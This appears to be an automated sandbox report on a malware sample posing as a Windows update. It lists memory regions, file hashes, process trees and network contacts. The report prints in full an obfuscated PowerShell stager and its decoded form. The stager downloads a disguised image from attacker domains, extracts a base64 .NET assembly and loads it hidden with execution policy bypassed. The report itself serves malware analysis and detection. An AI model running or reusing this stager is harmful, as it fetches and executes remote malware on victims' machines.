memory/1464-46-0x0000000005160000-0x0000000005170000-memory.dmp

memory/1464-44-0x0000000005160000-0x0000000005170000-memory.dmp

memory/5084-43-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp

memory/1464-48-0x0000000005720000-0x0000000005742000-memory.dmp

memory/1464-50-0x0000000005FA0000-0x0000000006006000-memory.dmp

memory/1464-49-0x0000000005E40000-0x0000000005EA6000-memory.dmp

memory/1464-60-0x0000000006020000-0x0000000006374000-memory.dmp

memory/1464-61-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/1464-62-0x0000000006520000-0x000000000656C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\Users\Admin\AppData\Local\Temp\qiygww.cmd

MD5 f95dfe17a283dbb9301936821032b9a4
SHA1 357edc773d07784e7fd295c2b273305994789fc4
SHA256 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c
SHA512 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8

memory/5084-68-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

memory/1880-69-0x0000000074AE0000-0x0000000075290000-memory.dmp

memory/1880-70-0x0000000004B80000-0x0000000004B90000-memory.dmp

memory/1880-71-0x0000000004B80000-0x0000000004B90000-memory.dmp

memory/1464-73-0x00000000069F0000-0x0000000006A0A000-memory.dmp

memory/1464-74-0x0000000006A40000-0x0000000006A62000-memory.dmp

memory/1464-72-0x00000000074B0000-0x0000000007546000-memory.dmp

memory/1464-81-0x0000000007B40000-0x00000000080E4000-memory.dmp

memory/1464-85-0x0000000008770000-0x0000000008DEA000-memory.dmp

memory/1464-86-0x0000000007830000-0x0000000007A62000-memory.dmp

memory/1464-87-0x00000000080F0000-0x0000000008312000-memory.dmp

memory/1880-89-0x0000000007260000-0x00000000074C2000-memory.dmp

memory/1880-91-0x0000000007DB0000-0x0000000007E42000-memory.dmp

memory/1880-90-0x00000000074D0000-0x000000000772C000-memory.dmp

memory/1880-92-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-93-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-95-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-97-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-100-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-103-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-105-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-107-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-109-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-111-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-113-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-115-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-117-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-119-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-121-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-123-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-125-0x00000000074D0000-0x0000000007727000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat

MD5 b73dc1ad88598d67c62f694c382be267
SHA1 7a5574b1e22e860e71c47104a588cfbcc78f9a63
SHA256 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687
SHA512 d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675

memory/1880-128-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-131-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-133-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-135-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-137-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-139-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-141-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-145-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-147-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-149-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-151-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-153-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-155-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-157-0x00000000074D0000-0x0000000007727000-memory.dmp

memory/1880-159-0x00000000074D0000-0x0000000007727000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ixgyed.bat

MD5 a27d0d05a470dc95f1c74c7861761e9f
SHA1 c4533a4822975c7a6316e375e365df82676dce76
SHA256 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7
SHA512 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f

memory/5084-351-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 def29ac8e5cffef459c3d64d6bb18fb2
SHA1 ab64966735208644930daf81af0fde24993d7d20
SHA256 1fc6235ced7ccb482365969ccf76b6e54ed12fb3bb09a7bd37e2fa161a09fe57
SHA512 c62966b63c9d7706beb01c9e29b014c2a10307a06defbb3d0137d7af97f211e87140098617a30f1dc0637f9b0e7d008d5f9b88a8cf2c78d3f97450aa77efef45

memory/1464-727-0x0000000074AE0000-0x0000000075290000-memory.dmp

memory/1548-729-0x0000000074AE0000-0x0000000075290000-memory.dmp

memory/1548-731-0x00000000048E0000-0x00000000048F0000-memory.dmp

memory/1548-732-0x00000000048E0000-0x00000000048F0000-memory.dmp

memory/1548-798-0x0000000006DC0000-0x0000000006FF0000-memory.dmp

memory/1548-805-0x00000000076D0000-0x00000000078EE000-memory.dmp

memory/1880-867-0x0000000074AE0000-0x0000000075290000-memory.dmp

memory/1880-868-0x0000000004B80000-0x0000000004B90000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240215-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQBuDgTreGQDgTreYQBiDgTreGkDgTreZDgTreDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files

memory/2152-5-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2152-6-0x0000000002C30000-0x0000000002CB0000-memory.dmp

memory/2152-7-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2152-4-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2152-9-0x0000000002C30000-0x0000000002CB0000-memory.dmp

memory/2152-8-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2152-10-0x0000000002C30000-0x0000000002CB0000-memory.dmp

memory/2152-11-0x0000000002C30000-0x0000000002CB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N49VBC6DQ5BB7A5T25YX.temp

MD5 67bbe7e09328fc2471b8d522d32e9df8
SHA1 a572e8c7f62262893b7fdaddb456853fa8747df4
SHA256 d15c9016f579b6c3f48705edd42ae087efdfc1c07a3ee7f7540c8266aaf319f2
SHA512 8bc81074d9d25db83f692381baeb4056e5b46f6a277ab9a05059daeb6fb9300fe2b81f2b690550f3bb9a2c84ee4111356342569e0ffb9c997c09bf9ea4cd10db

memory/2756-17-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2756-18-0x0000000002E30000-0x0000000002EB0000-memory.dmp

memory/2756-19-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2756-20-0x0000000002E30000-0x0000000002EB0000-memory.dmp

memory/2756-21-0x0000000002E30000-0x0000000002EB0000-memory.dmp

memory/2756-22-0x000000001AEB0000-0x000000001AEFE000-memory.dmp

memory/2756-23-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2152-24-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

119s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

